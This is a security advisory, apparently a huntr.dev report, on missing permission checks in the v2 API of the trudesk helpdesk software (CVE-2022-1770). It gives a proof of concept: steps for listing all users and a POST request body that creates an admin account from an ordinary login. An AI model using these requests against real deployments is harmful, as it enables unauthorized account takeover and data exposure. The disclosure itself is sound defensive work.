Lucene search
Tienpa9974A252A2-8BF6-4F88-A180-B90338A239FAHistoryMay 12, 2022 - 3:10 p.m.
Improper Privilege Management API V2
2022-05-1215:10:47
tienpa99
www.huntr.dev
22
api v2
privilege management
unauthorized access
ticket
account
group
department
team
elasticsearch
user list
admin user creation
vulnerability
attack vector
EPSS
0.001
Percentile
41.1%
Description
There are some api v2 doesn’t check permission allow attackers to retrieve/edit information ticket,account,group,department,team,ElasticSearch
Proof of Concept
Get users list
1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. Users list return.
Create user with admin role
1. Get the admin role id in `/api/v2/accounts`.
2. Send POST to `/api/v2/accounts`.
{"username":"test21233","fullname":"test21233","title":"test2","email":"[email protected]","teams":["627ce1fd9f59377095600ce9"],"role":"627ce1fd9f59377095600ce1","password":"test2test2","passwordConfirm":"test2test2"}
- Create successfully.
Note
Many api endpoint get vulnerable, i just show piece of attack vector that can happen.
Related
prion
prion
Input validation
2022-05-20 18:15:00
cvelist
cvelist
CVE-2022-1770 Improper Privilege Management in polonel/trudesk
2022-05-20 18:05:10
nvd
nvd
CVE-2022-1770
2022-05-20 18:15:07
osv
osv
CVE-2022-1770
2022-05-20 18:15:07
cve
cve
CVE-2022-1770
2022-05-20 18:15:07